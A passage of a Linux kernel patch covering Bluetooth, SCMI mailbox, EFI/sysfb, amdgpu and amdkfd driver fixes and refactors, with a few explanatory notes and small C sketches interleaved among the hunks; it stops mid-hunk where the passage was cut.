+diff --git a/drivers/bluetooth/btsdio.c b/drivers/bluetooth/btsdio.c
+index 795be33f2892d..02893600db390 100644
+--- a/drivers/bluetooth/btsdio.c
++++ b/drivers/bluetooth/btsdio.c
+@@ -354,6 +354,7 @@ static void btsdio_remove(struct sdio_func *func)
+ 
+ 	BT_DBG("func %p", func);
+ 
+ 	if (!data)
+ 		return;
+ 
++	cancel_work_sync(&data->work);
+diff --git a/drivers/bluetooth/btusb.c b/drivers/bluetooth/btusb.c
+index 952dc9d2404ed..90b85dcb138df 100644
+--- a/drivers/bluetooth/btusb.c
++++ b/drivers/bluetooth/btusb.c
+@@ -1020,21 +1020,11 @@ static int btusb_recv_bulk(struct btusb_data *data, void *buffer, int count)
+ 		hci_skb_expect(skb) -= len;
+ 
+ 		if (skb->len == HCI_ACL_HDR_SIZE) {
+-			__u16 handle = __le16_to_cpu(hci_acl_hdr(skb)->handle);
+ 			__le16 dlen = hci_acl_hdr(skb)->dlen;
+-			__u8 type;
+ 
+ 			/* Complete ACL header */
+ 			hci_skb_expect(skb) = __le16_to_cpu(dlen);
+ 
+-			/* Detect if ISO packet has been sent over bulk */
+-			if (hci_conn_num(data->hdev, ISO_LINK)) {
+-				type = hci_conn_lookup_type(data->hdev,
+-							    hci_handle(handle));
+-				if (type == ISO_LINK)
+-					hci_skb_pkt_type(skb) = HCI_ISODATA_PKT;
+-			}
+-
+ 			if (skb_tailroom(skb) < hci_skb_expect(skb)) {
+ 				kfree_skb(skb);
+ 				skb = NULL;
+diff --git a/drivers/bus/imx-weim.c b/drivers/bus/imx-weim.c
+index 828c66bbaa676..55d917bd1f3f8 100644
+--- a/drivers/bus/imx-weim.c
++++ b/drivers/bus/imx-weim.c
+@@ -204,8 +204,8 @@ static int weim_parse_dt(struct platform_device *pdev)
+ 	const struct of_device_id *of_id = of_match_device(weim_id_table,
+ 							   &pdev->dev);
+ 	const struct imx_weim_devtype *devtype = of_id->data;
++	int ret = 0, have_child = 0;
+ 	struct device_node *child;
+-	int ret, have_child = 0;
+ 	struct weim_priv *priv;
+ 	void __iomem *base;
+ 	u32 reg;
+diff --git a/drivers/firmware/arm_scmi/mailbox.c b/drivers/firmware/arm_scmi/mailbox.c
+index 1e40cb035044d..a455f3c0e98b2 100644
+--- a/drivers/firmware/arm_scmi/mailbox.c
++++ b/drivers/firmware/arm_scmi/mailbox.c
+@@ -52,6 +52,39 @@ static bool mailbox_chan_available(struct device *dev, int idx)
+ 					   "#mbox-cells", idx, NULL);
+ }
+ 
++static int mailbox_chan_validate(struct device *cdev)
++{
++	int num_mb, num_sh, ret = 0;
++	struct device_node *np = cdev->of_node;
++
++	num_mb = of_count_phandle_with_args(np, "mboxes", "#mbox-cells");
++	num_sh = of_count_phandle_with_args(np, "shmem", NULL);
++	/* Bail out if mboxes and shmem descriptors are inconsistent */
++	if (num_mb <= 0 || num_sh > 2 || num_mb != num_sh) {
++		dev_warn(cdev, "Invalid channel descriptor for '%s'\n",
++			 of_node_full_name(np));
++		return -EINVAL;
++	}
++
++	if (num_sh > 1) {
++		struct device_node *np_tx, *np_rx;
++
++		np_tx = of_parse_phandle(np, "shmem", 0);
++		np_rx = of_parse_phandle(np, "shmem", 1);
++		/* SCMI Tx and Rx shared mem areas have to be distinct */
++		if (!np_tx || !np_rx || np_tx == np_rx) {
++			dev_warn(cdev, "Invalid shmem descriptor for '%s'\n",
++				 of_node_full_name(np));
++			ret = -EINVAL;
++		}
++
++		of_node_put(np_tx);
++		of_node_put(np_rx);
++	}
++
++	return ret;
++}
++
+ static int mailbox_chan_setup(struct scmi_chan_info *cinfo, struct device *dev,
+ 			      bool tx)
+ {
+@@ -64,6 +97,10 @@ static int mailbox_chan_setup(struct scmi_chan_info *cinfo, struct device *dev,
+ 	resource_size_t size;
+ 	struct resource res;
+ 
++	ret = mailbox_chan_validate(cdev);
++	if (ret)
++		return ret;
++
+ 	smbox = devm_kzalloc(dev, sizeof(*smbox), GFP_KERNEL);
+ 	if (!smbox)
+ 		return -ENOMEM;
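The validation rule encoded above: the mboxes and shmem phandle counts must match (1 for Tx-only, 2 for Tx plus Rx), and the two shared-memory areas must be distinct. A self-contained sketch with plain integers standing in for device-tree nodes:

#include <stdbool.h>
#include <stdio.h>

static bool chan_desc_valid(int num_mb, int num_sh, int shmem_tx, int shmem_rx)
{
	/* Bail out if mboxes and shmem descriptors are inconsistent. */
	if (num_mb <= 0 || num_sh > 2 || num_mb != num_sh)
		return false;
	/* With two areas, Tx and Rx shared memory must be distinct. */
	if (num_sh > 1 && (!shmem_tx || !shmem_rx || shmem_tx == shmem_rx))
		return false;
	return true;
}

int main(void)
{
	printf("1 mbox / 1 shmem:  %d\n", chan_desc_valid(1, 1, 10, 0));
	printf("2 mbox, tx == rx:  %d\n", chan_desc_valid(2, 2, 10, 10));
	return 0;
}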
+diff --git a/drivers/firmware/efi/libstub/smbios.c b/drivers/firmware/efi/libstub/smbios.c
+index 460418b7f5f5e..aadb422b9637d 100644
+--- a/drivers/firmware/efi/libstub/smbios.c
++++ b/drivers/firmware/efi/libstub/smbios.c
+@@ -36,7 +36,7 @@ const u8 *__efi_get_smbios_string(u8 type, int offset, int recsize)
+ 	if (status != EFI_SUCCESS)
+ 		return NULL;
+ 
+-	strtable = (u8 *)record + recsize;
++	strtable = (u8 *)record + record->length;
+ 	for (int i = 1; i < ((u8 *)record)[offset]; i++) {
+ 		int len = strlen(strtable);
+ 
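The fix matters because SMBIOS strings start right after the formatted area, whose size is the record's own length byte rather than the compile-time struct size. A runnable walk over a fabricated record (byte 1 of an SMBIOS header is the formatted-area length):

#include <stdio.h>
#include <string.h>

static void dump_strings(const unsigned char *record)
{
	const char *s = (const char *)record + record[1];

	while (*s) {			/* the string-set ends with an extra NUL */
		printf("%s\n", s);
		s += strlen(s) + 1;
	}
}

int main(void)
{
	/* Fabricated record: 4 formatted bytes, then two strings. */
	unsigned char rec[] = { 1, 4, 0, 0, 'A', 'c', 'm', 'e', 0, 'X', '1', 0, 0 };

	dump_strings(rec);
	return 0;
}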
+diff --git a/drivers/firmware/efi/sysfb_efi.c b/drivers/firmware/efi/sysfb_efi.c
+index f06fdacc9bc83..e76d6803bdd08 100644
+--- a/drivers/firmware/efi/sysfb_efi.c
++++ b/drivers/firmware/efi/sysfb_efi.c
+@@ -341,7 +341,7 @@ static const struct fwnode_operations efifb_fwnode_ops = {
+ #ifdef CONFIG_EFI
+ static struct fwnode_handle efifb_fwnode;
+ 
+-__init void sysfb_apply_efi_quirks(struct platform_device *pd)
++__init void sysfb_apply_efi_quirks(void)
+ {
+ 	if (screen_info.orig_video_isVGA != VIDEO_TYPE_EFI ||
+ 	    !(screen_info.capabilities & VIDEO_CAPABILITY_SKIP_QUIRKS))
+@@ -355,7 +355,10 @@ __init void sysfb_apply_efi_quirks(struct platform_device *pd)
+ 		screen_info.lfb_height = temp;
+ 		screen_info.lfb_linelength = 4 * screen_info.lfb_width;
+ 	}
++}
+ 
++__init void sysfb_set_efifb_fwnode(struct platform_device *pd)
++{
+ 	if (screen_info.orig_video_isVGA == VIDEO_TYPE_EFI && IS_ENABLED(CONFIG_PCI)) {
+ 		fwnode_init(&efifb_fwnode, &efifb_fwnode_ops);
+ 		pd->dev.fwnode = &efifb_fwnode;
+diff --git a/drivers/firmware/sysfb.c b/drivers/firmware/sysfb.c
+index 3fd3563d962b8..3c197db42c9d9 100644
+--- a/drivers/firmware/sysfb.c
++++ b/drivers/firmware/sysfb.c
+@@ -81,6 +81,8 @@ static __init int sysfb_init(void)
+ 	if (disabled)
+ 		goto unlock_mutex;
+ 
++	sysfb_apply_efi_quirks();
++
+ 	/* try to create a simple-framebuffer device */
+ 	compatible = sysfb_parse_mode(si, &mode);
+ 	if (compatible) {
+@@ -107,7 +109,7 @@ static __init int sysfb_init(void)
+ 		goto unlock_mutex;
+ 	}
+ 
+-	sysfb_apply_efi_quirks(pd);
++	sysfb_set_efifb_fwnode(pd);
+ 
+ 	ret = platform_device_add_data(pd, si, sizeof(*si));
+ 	if (ret)
+diff --git a/drivers/firmware/sysfb_simplefb.c b/drivers/firmware/sysfb_simplefb.c
+index a353e27f83f54..ca907f7e76c65 100644
+--- a/drivers/firmware/sysfb_simplefb.c
++++ b/drivers/firmware/sysfb_simplefb.c
+@@ -110,7 +110,7 @@ __init struct platform_device *sysfb_create_simplefb(const struct screen_info *s
+ 	if (!pd)
+ 		return ERR_PTR(-ENOMEM);
+ 
+-	sysfb_apply_efi_quirks(pd);
++	sysfb_set_efifb_fwnode(pd);
+ 
+ 	ret = platform_device_add_resources(pd, &res, 1);
+ 	if (ret)
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu.h b/drivers/gpu/drm/amd/amdgpu/amdgpu.h
+index 5f1d0990c6f34..39c5e14b02529 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu.h
+@@ -1263,6 +1263,7 @@ void amdgpu_device_pci_config_reset(struct amdgpu_device *adev);
+ int amdgpu_device_pci_reset(struct amdgpu_device *adev);
+ bool amdgpu_device_need_post(struct amdgpu_device *adev);
+ bool amdgpu_device_should_use_aspm(struct amdgpu_device *adev);
++bool amdgpu_device_aspm_support_quirk(void);
+ 
+ void amdgpu_cs_report_moved_bytes(struct amdgpu_device *adev, u64 num_bytes,
+ 				  u64 num_vis_bytes);
+@@ -1382,10 +1383,12 @@ int amdgpu_acpi_smart_shift_update(struct drm_device *dev, enum amdgpu_ss ss_sta
+ int amdgpu_acpi_pcie_notify_device_ready(struct amdgpu_device *adev);
+ 
+ void amdgpu_acpi_get_backlight_caps(struct amdgpu_dm_backlight_caps *caps);
++bool amdgpu_acpi_should_gpu_reset(struct amdgpu_device *adev);
+ void amdgpu_acpi_detect(void);
+ #else
+ static inline int amdgpu_acpi_init(struct amdgpu_device *adev) { return 0; }
+ static inline void amdgpu_acpi_fini(struct amdgpu_device *adev) { }
++static inline bool amdgpu_acpi_should_gpu_reset(struct amdgpu_device *adev) { return false; }
+ static inline void amdgpu_acpi_detect(void) { }
+ static inline bool amdgpu_acpi_is_power_shift_control_supported(void) { return false; }
+ static inline int amdgpu_acpi_power_shift_control(struct amdgpu_device *adev,
+@@ -1396,11 +1399,9 @@ static inline int amdgpu_acpi_smart_shift_update(struct drm_device *dev,
+ 
+ #if defined(CONFIG_ACPI) && defined(CONFIG_SUSPEND)
+ bool amdgpu_acpi_is_s3_active(struct amdgpu_device *adev);
+-bool amdgpu_acpi_should_gpu_reset(struct amdgpu_device *adev);
+ bool amdgpu_acpi_is_s0ix_active(struct amdgpu_device *adev);
+ #else
+ static inline bool amdgpu_acpi_is_s0ix_active(struct amdgpu_device *adev) { return false; }
+-static inline bool amdgpu_acpi_should_gpu_reset(struct amdgpu_device *adev) { return false; }
+ static inline bool amdgpu_acpi_is_s3_active(struct amdgpu_device *adev) { return false; }
+ #endif
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_acpi.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_acpi.c
+index b14800ac179ee..435d81d6ffd9b 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_acpi.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_acpi.c
+@@ -971,6 +971,29 @@ static bool amdgpu_atcs_pci_probe_handle(struct pci_dev *pdev)
+ 	return true;
+ }
+ 
++
++/**
++ * amdgpu_acpi_should_gpu_reset
++ *
++ * @adev: amdgpu device pointer
++ *
++ * Returns true if the GPU should be reset, false if not.
++ */
++bool amdgpu_acpi_should_gpu_reset(struct amdgpu_device *adev)
++{
++	if (adev->flags & AMD_IS_APU)
++		return false;
++
++	if (amdgpu_sriov_vf(adev))
++		return false;
++
++#if IS_ENABLED(CONFIG_SUSPEND)
++	return pm_suspend_target_state != PM_SUSPEND_TO_IDLE;
++#else
++	return true;
++#endif
++}
++
+ /*
+  * amdgpu_acpi_detect - detect ACPI ATIF/ATCS methods
+  *
+@@ -1042,24 +1065,6 @@ bool amdgpu_acpi_is_s3_active(struct amdgpu_device *adev)
+ 		(pm_suspend_target_state == PM_SUSPEND_MEM);
+ }
+ 
+-/**
+- * amdgpu_acpi_should_gpu_reset
+- *
+- * @adev: amdgpu_device_pointer
+- *
+- * returns true if should reset GPU, false if not
+- */
+-bool amdgpu_acpi_should_gpu_reset(struct amdgpu_device *adev)
+-{
+-	if (adev->flags & AMD_IS_APU)
+-		return false;
+-
+-	if (amdgpu_sriov_vf(adev))
+-		return false;
+-
+-	return pm_suspend_target_state != PM_SUSPEND_TO_IDLE;
+-}
+-
+ /**
+  * amdgpu_acpi_is_s0ix_active
+  *
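Moving the function out of the CONFIG_SUSPEND-only block requires guarding the pm_suspend_target_state access, as above. A userspace model of the pattern (stubs replace the kernel symbols; toggle the define to see both paths):

#include <stdbool.h>
#include <stdio.h>

#define CONFIG_SUSPEND 1	/* set to 0 to exercise the !SUSPEND path */

enum pm_state { PM_SUSPEND_TO_IDLE, PM_SUSPEND_MEM };
static enum pm_state pm_suspend_target_state = PM_SUSPEND_MEM;

static bool should_gpu_reset(bool is_apu, bool is_vf)
{
	if (is_apu || is_vf)
		return false;
#if CONFIG_SUSPEND
	return pm_suspend_target_state != PM_SUSPEND_TO_IDLE;
#else
	return true;
#endif
}

int main(void)
{
	printf("reset dGPU: %d\n", should_gpu_reset(false, false));
	return 0;
}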
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index 824b0b356b3ce..9ef83f3ab3a7e 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -78,6 +78,10 @@
+ 
+ #include <drm/drm_drv.h>
+ 
++#if IS_ENABLED(CONFIG_X86)
++#include <asm/intel-family.h>
++#endif
++
+ MODULE_FIRMWARE("amdgpu/vega10_gpu_info.bin");
+ MODULE_FIRMWARE("amdgpu/vega12_gpu_info.bin");
+ MODULE_FIRMWARE("amdgpu/raven_gpu_info.bin");
+@@ -1353,6 +1357,17 @@ bool amdgpu_device_should_use_aspm(struct amdgpu_device *adev)
+ 	return pcie_aspm_enabled(adev->pdev);
+ }
+ 
++bool amdgpu_device_aspm_support_quirk(void)
++{
++#if IS_ENABLED(CONFIG_X86)
++	struct cpuinfo_x86 *c = &cpu_data(0);
++
++	return !(c->x86 == 6 && c->x86_model == INTEL_FAM6_ALDERLAKE);
++#else
++	return true;
++#endif
++}
++
+ /* if we get transitioned to only one device, take VGA back */
+ /**
+  * amdgpu_device_vga_set_decode - enable/disable vga decode
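The shared helper added above denies ASPM on Alder Lake hosts by matching CPU family 6 and the Alder Lake model. A standalone sketch; 0x97 is the desktop Alder Lake model number from mainline's intel-family.h, used here purely for illustration:

#include <stdbool.h>
#include <stdio.h>

#define INTEL_FAM6_ALDERLAKE 0x97	/* desktop Alder Lake model */

struct cpu { unsigned int family, model; };

static bool aspm_support_quirk(const struct cpu *c)
{
	/* ASPM is denied only on family 6 / Alder Lake hosts. */
	return !(c->family == 6 && c->model == INTEL_FAM6_ALDERLAKE);
}

int main(void)
{
	struct cpu adl = { 6, INTEL_FAM6_ALDERLAKE };

	printf("enable ASPM on Alder Lake host: %d\n",
	       aspm_support_quirk(&adl));
	return 0;
}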
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+index dfbeef2c4a9e2..871f481f84328 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+@@ -2447,7 +2447,10 @@ static int amdgpu_pmops_freeze(struct device *dev)
+ 	adev->in_s4 = false;
+ 	if (r)
+ 		return r;
+-	return amdgpu_asic_reset(adev);
++
++	if (amdgpu_acpi_should_gpu_reset(adev))
++		return amdgpu_asic_reset(adev);
++	return 0;
+ }
+ 
+ static int amdgpu_pmops_thaw(struct device *dev)
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
+index cfd78c4a45baa..4feedf518a191 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_object.c
+@@ -1312,7 +1312,7 @@ void amdgpu_bo_release_notify(struct ttm_buffer_object *bo)
+ 
+ 	if (!bo->resource || bo->resource->mem_type != TTM_PL_VRAM ||
+ 	    !(abo->flags & AMDGPU_GEM_CREATE_VRAM_WIPE_ON_RELEASE) ||
+-	    adev->in_suspend || adev->shutdown)
++	    adev->in_suspend || drm_dev_is_unplugged(adev_to_drm(adev)))
+ 		return;
+ 
+ 	if (WARN_ON_ONCE(!dma_resv_trylock(bo->base.resv)))
+diff --git a/drivers/gpu/drm/amd/amdgpu/nbio_v7_2.c b/drivers/gpu/drm/amd/amdgpu/nbio_v7_2.c
+index 4b0d563c6522c..4ef1fa4603c8e 100644
+--- a/drivers/gpu/drm/amd/amdgpu/nbio_v7_2.c
++++ b/drivers/gpu/drm/amd/amdgpu/nbio_v7_2.c
+@@ -382,11 +382,6 @@ static void nbio_v7_2_init_registers(struct amdgpu_device *adev)
+ 		if (def != data)
+ 			WREG32_PCIE_PORT(SOC15_REG_OFFSET(NBIO, 0, regBIF1_PCIE_MST_CTRL_3), data);
+ 		break;
+-	case IP_VERSION(7, 5, 1):
+-		data = RREG32_SOC15(NBIO, 0, regRCC_DEV2_EPF0_STRAP2);
+-		data &= ~RCC_DEV2_EPF0_STRAP2__STRAP_NO_SOFT_RESET_DEV2_F0_MASK;
+-		WREG32_SOC15(NBIO, 0, regRCC_DEV2_EPF0_STRAP2, data);
+-		fallthrough;
+ 	default:
+ 		def = data = RREG32_PCIE_PORT(SOC15_REG_OFFSET(NBIO, 0, regPCIE_CONFIG_CNTL));
+ 		data = REG_SET_FIELD(data, PCIE_CONFIG_CNTL,
+@@ -399,6 +394,15 @@ static void nbio_v7_2_init_registers(struct amdgpu_device *adev)
+ 		break;
+ 	}
+ 
++	switch (adev->ip_versions[NBIO_HWIP][0]) {
++	case IP_VERSION(7, 3, 0):
++	case IP_VERSION(7, 5, 1):
++		data = RREG32_SOC15(NBIO, 0, regRCC_DEV2_EPF0_STRAP2);
++		data &= ~RCC_DEV2_EPF0_STRAP2__STRAP_NO_SOFT_RESET_DEV2_F0_MASK;
++		WREG32_SOC15(NBIO, 0, regRCC_DEV2_EPF0_STRAP2, data);
++		break;
++	}
++
+ 	if (amdgpu_sriov_vf(adev))
+ 		adev->rmmio_remap.reg_offset = SOC15_REG_OFFSET(NBIO, 0,
+ 			regBIF_BX_PF0_HDP_MEM_COHERENCY_FLUSH_CNTL) << 2;
+diff --git a/drivers/gpu/drm/amd/amdgpu/nv.c b/drivers/gpu/drm/amd/amdgpu/nv.c
+index df3388e8dec00..877989278290a 100644
+--- a/drivers/gpu/drm/amd/amdgpu/nv.c
++++ b/drivers/gpu/drm/amd/amdgpu/nv.c
+@@ -527,7 +527,7 @@ static void nv_pcie_gen3_enable(struct amdgpu_device *adev)
+ 
+ static void nv_program_aspm(struct amdgpu_device *adev)
+ {
+-	if (!amdgpu_device_should_use_aspm(adev))
++	if (!amdgpu_device_should_use_aspm(adev) || !amdgpu_device_aspm_support_quirk())
+ 		return;
+ 
+ 	if (!(adev->flags & AMD_IS_APU) &&
+diff --git a/drivers/gpu/drm/amd/amdgpu/vi.c b/drivers/gpu/drm/amd/amdgpu/vi.c
+index f6ffd7c96ff98..d6c37c90c628c 100644
+--- a/drivers/gpu/drm/amd/amdgpu/vi.c
++++ b/drivers/gpu/drm/amd/amdgpu/vi.c
+@@ -81,10 +81,6 @@
+ #include "mxgpu_vi.h"
+ #include "amdgpu_dm.h"
+ 
+-#if IS_ENABLED(CONFIG_X86)
+-#include <asm/intel-family.h>
+-#endif
+-
+ #define ixPCIE_LC_L1_PM_SUBSTATE	0x100100C6
+ #define PCIE_LC_L1_PM_SUBSTATE__LC_L1_SUBSTATES_OVERRIDE_EN_MASK	0x00000001L
+ #define PCIE_LC_L1_PM_SUBSTATE__LC_PCI_PM_L1_2_OVERRIDE_MASK	0x00000002L
+@@ -1138,24 +1134,13 @@ static void vi_enable_aspm(struct amdgpu_device *adev)
+ 		WREG32_PCIE(ixPCIE_LC_CNTL, data);
+ }
+ 
+-static bool aspm_support_quirk_check(void)
+-{
+-#if IS_ENABLED(CONFIG_X86)
+-	struct cpuinfo_x86 *c = &cpu_data(0);
+-
+-	return !(c->x86 == 6 && c->x86_model == INTEL_FAM6_ALDERLAKE);
+-#else
+-	return true;
+-#endif
+-}
+-
+ static void vi_program_aspm(struct amdgpu_device *adev)
+ {
+ 	u32 data, data1, orig;
+ 	bool bL1SS = false;
+ 	bool bClkReqSupport = true;
+ 
+-	if (!amdgpu_device_should_use_aspm(adev) || !aspm_support_quirk_check())
++	if (!amdgpu_device_should_use_aspm(adev) || !amdgpu_device_aspm_support_quirk())
+ 		return;
+ 
+ 	if (adev->flags & AMD_IS_APU ||
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_crat.c b/drivers/gpu/drm/amd/amdkfd/kfd_crat.c
+index 8bfdfd062ff64..e45c6bc8d10bb 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_crat.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_crat.c
+@@ -50,16 +50,6 @@ static inline unsigned int get_and_inc_gpu_processor_id(
+ 	return current_id;
+ }
+ 
+-/* Static table to describe GPU Cache information */
+-struct kfd_gpu_cache_info {
+-	uint32_t	cache_size;
+-	uint32_t	cache_level;
+-	uint32_t	flags;
+-	/* Indicates how many Compute Units share this cache
+-	 * within a SA. Value = 1 indicates the cache is not shared
+-	 */
+-	uint32_t	num_cu_shared;
+-};
+ 
+ static struct kfd_gpu_cache_info kaveri_cache_info[] = {
+ 	{
+@@ -891,6 +881,54 @@ static struct kfd_gpu_cache_info gc_10_3_6_cache_info[] = {
+ 	},
+ };
+ 
++static struct kfd_gpu_cache_info dummy_cache_info[] = {
++	{
++		/* TCP L1 Cache per CU */
++		.cache_size = 16,
++		.cache_level = 1,
++		.flags = (CRAT_CACHE_FLAGS_ENABLED |
++				CRAT_CACHE_FLAGS_DATA_CACHE |
++				CRAT_CACHE_FLAGS_SIMD_CACHE),
++		.num_cu_shared = 1,
++	},
++	{
++		/* Scalar L1 Instruction Cache per SQC */
++		.cache_size = 32,
++		.cache_level = 1,
++		.flags = (CRAT_CACHE_FLAGS_ENABLED |
++				CRAT_CACHE_FLAGS_INST_CACHE |
++				CRAT_CACHE_FLAGS_SIMD_CACHE),
++		.num_cu_shared = 2,
++	},
++	{
++		/* Scalar L1 Data Cache per SQC */
++		.cache_size = 16,
++		.cache_level = 1,
++		.flags = (CRAT_CACHE_FLAGS_ENABLED |
++				CRAT_CACHE_FLAGS_DATA_CACHE |
++				CRAT_CACHE_FLAGS_SIMD_CACHE),
++		.num_cu_shared = 2,
++	},
++	{
++		/* GL1 Data Cache per SA */
++		.cache_size = 128,
++		.cache_level = 1,
++		.flags = (CRAT_CACHE_FLAGS_ENABLED |
++				CRAT_CACHE_FLAGS_DATA_CACHE |
++				CRAT_CACHE_FLAGS_SIMD_CACHE),
++		.num_cu_shared = 6,
++	},
++	{
++		/* L2 Data Cache per GPU (Total Tex Cache) */
++		.cache_size = 2048,
++		.cache_level = 2,
++		.flags = (CRAT_CACHE_FLAGS_ENABLED |
++				CRAT_CACHE_FLAGS_DATA_CACHE |
++				CRAT_CACHE_FLAGS_SIMD_CACHE),
++		.num_cu_shared = 6,
++	},
++};
++
+ static void kfd_populated_cu_info_cpu(struct kfd_topology_device *dev,
+ 		struct crat_subtype_computeunit *cu)
+ {
+@@ -1071,8 +1109,12 @@ static int kfd_parse_subtype_cache(struct crat_subtype_cache *cache,
+ 			props->cachelines_per_tag = cache->lines_per_tag;
+ 			props->cache_assoc = cache->associativity;
+ 			props->cache_latency = cache->cache_latency;
++
+ 			memcpy(props->sibling_map, cache->sibling_map,
+-					sizeof(props->sibling_map));
++					CRAT_SIBLINGMAP_SIZE);
++
++			/* set sibling_map_size to 32 for CRAT from ACPI */
++			props->sibling_map_size = CRAT_SIBLINGMAP_SIZE;
+ 
+ 			if (cache->flags & CRAT_CACHE_FLAGS_DATA_CACHE)
+ 				props->cache_type |= HSA_CACHE_TYPE_DATA;
+@@ -1291,125 +1333,6 @@ err:
+ 	return ret;
+ }
+ 
+-/* Helper function. See kfd_fill_gpu_cache_info for parameter description */
+-static int fill_in_l1_pcache(struct crat_subtype_cache *pcache,
+-				struct kfd_gpu_cache_info *pcache_info,
+-				struct kfd_cu_info *cu_info,
+-				int mem_available,
+-				int cu_bitmask,
+-				int cache_type, unsigned int cu_processor_id,
+-				int cu_block)
+-{
+-	unsigned int cu_sibling_map_mask;
+-	int first_active_cu;
+-
+-	/* First check if enough memory is available */
+-	if (sizeof(struct crat_subtype_cache) > mem_available)
+-		return -ENOMEM;
+-
+-	cu_sibling_map_mask = cu_bitmask;
+-	cu_sibling_map_mask >>= cu_block;
+-	cu_sibling_map_mask &=
+-		((1 << pcache_info[cache_type].num_cu_shared) - 1);
+-	first_active_cu = ffs(cu_sibling_map_mask);
+-
+-	/* CU could be inactive. In case of shared cache find the first active
+-	 * CU. and incase of non-shared cache check if the CU is inactive. If
+-	 * inactive active skip it
+-	 */
+-	if (first_active_cu) {
+-		memset(pcache, 0, sizeof(struct crat_subtype_cache));
+-		pcache->type = CRAT_SUBTYPE_CACHE_AFFINITY;
+-		pcache->length = sizeof(struct crat_subtype_cache);
+-		pcache->flags = pcache_info[cache_type].flags;
+-		pcache->processor_id_low = cu_processor_id
+-					 + (first_active_cu - 1);
+-		pcache->cache_level = pcache_info[cache_type].cache_level;
+-		pcache->cache_size = pcache_info[cache_type].cache_size;
+-
+-		/* Sibling map is w.r.t processor_id_low, so shift out
+-		 * inactive CU
+-		 */
+-		cu_sibling_map_mask =
+-			cu_sibling_map_mask >> (first_active_cu - 1);
+-
+-		pcache->sibling_map[0] = (uint8_t)(cu_sibling_map_mask & 0xFF);
+-		pcache->sibling_map[1] =
+-				(uint8_t)((cu_sibling_map_mask >> 8) & 0xFF);
+-		pcache->sibling_map[2] =
+-				(uint8_t)((cu_sibling_map_mask >> 16) & 0xFF);
+-		pcache->sibling_map[3] =
+-				(uint8_t)((cu_sibling_map_mask >> 24) & 0xFF);
+-		return 0;
+-	}
+-	return 1;
+-}
+-
+-/* Helper function. See kfd_fill_gpu_cache_info for parameter description */
+-static int fill_in_l2_l3_pcache(struct crat_subtype_cache *pcache,
+-				struct kfd_gpu_cache_info *pcache_info,
+-				struct kfd_cu_info *cu_info,
+-				int mem_available,
+-				int cache_type, unsigned int cu_processor_id)
+-{
+-	unsigned int cu_sibling_map_mask;
+-	int first_active_cu;
+-	int i, j, k;
+-
+-	/* First check if enough memory is available */
+-	if (sizeof(struct crat_subtype_cache) > mem_available)
+-		return -ENOMEM;
+-
+-	cu_sibling_map_mask = cu_info->cu_bitmap[0][0];
+-	cu_sibling_map_mask &=
+-		((1 << pcache_info[cache_type].num_cu_shared) - 1);
+-	first_active_cu = ffs(cu_sibling_map_mask);
+-
+-	/* CU could be inactive. In case of shared cache find the first active
+-	 * CU. and incase of non-shared cache check if the CU is inactive. If
+-	 * inactive active skip it
+-	 */
+-	if (first_active_cu) {
+-		memset(pcache, 0, sizeof(struct crat_subtype_cache));
+-		pcache->type = CRAT_SUBTYPE_CACHE_AFFINITY;
+-		pcache->length = sizeof(struct crat_subtype_cache);
+-		pcache->flags = pcache_info[cache_type].flags;
+-		pcache->processor_id_low = cu_processor_id
+-					 + (first_active_cu - 1);
+-		pcache->cache_level = pcache_info[cache_type].cache_level;
+-		pcache->cache_size = pcache_info[cache_type].cache_size;
+-
+-		/* Sibling map is w.r.t processor_id_low, so shift out
+-		 * inactive CU
+-		 */
+-		cu_sibling_map_mask =
+-			cu_sibling_map_mask >> (first_active_cu - 1);
+-		k = 0;
+-		for (i = 0; i < cu_info->num_shader_engines; i++) {
+-			for (j = 0; j < cu_info->num_shader_arrays_per_engine;
+-				j++) {
+-				pcache->sibling_map[k] =
+-				 (uint8_t)(cu_sibling_map_mask & 0xFF);
+-				pcache->sibling_map[k+1] =
+-				 (uint8_t)((cu_sibling_map_mask >> 8) & 0xFF);
+-				pcache->sibling_map[k+2] =
+-				 (uint8_t)((cu_sibling_map_mask >> 16) & 0xFF);
+-				pcache->sibling_map[k+3] =
+-				 (uint8_t)((cu_sibling_map_mask >> 24) & 0xFF);
+-				k += 4;
+-				cu_sibling_map_mask =
+-					cu_info->cu_bitmap[i % 4][j + i / 4];
+-				cu_sibling_map_mask &= (
+-				 (1 << pcache_info[cache_type].num_cu_shared)
+-				 - 1);
+-			}
+-		}
+-		return 0;
+-	}
+-	return 1;
+-}
+-
+-#define KFD_MAX_CACHE_TYPES 6
+ 
+ static int kfd_fill_gpu_cache_info_from_gfx_config(struct kfd_dev *kdev,
+ 						   struct kfd_gpu_cache_info *pcache_info)
+@@ -1483,228 +1406,134 @@ static int kfd_fill_gpu_cache_info_from_gfx_config(struct kfd_dev *kdev,
+ 	return i;
+ }
+ 
+-/* kfd_fill_gpu_cache_info - Fill GPU cache info using kfd_gpu_cache_info
+- * tables
+- *
+- *	@kdev - [IN] GPU device
+- *	@gpu_processor_id - [IN] GPU processor ID to which these caches
+- *			    associate
+- *	@available_size - [IN] Amount of memory available in pcache
+- *	@cu_info - [IN] Compute Unit info obtained from KGD
+- *	@pcache - [OUT] memory into which cache data is to be filled in.
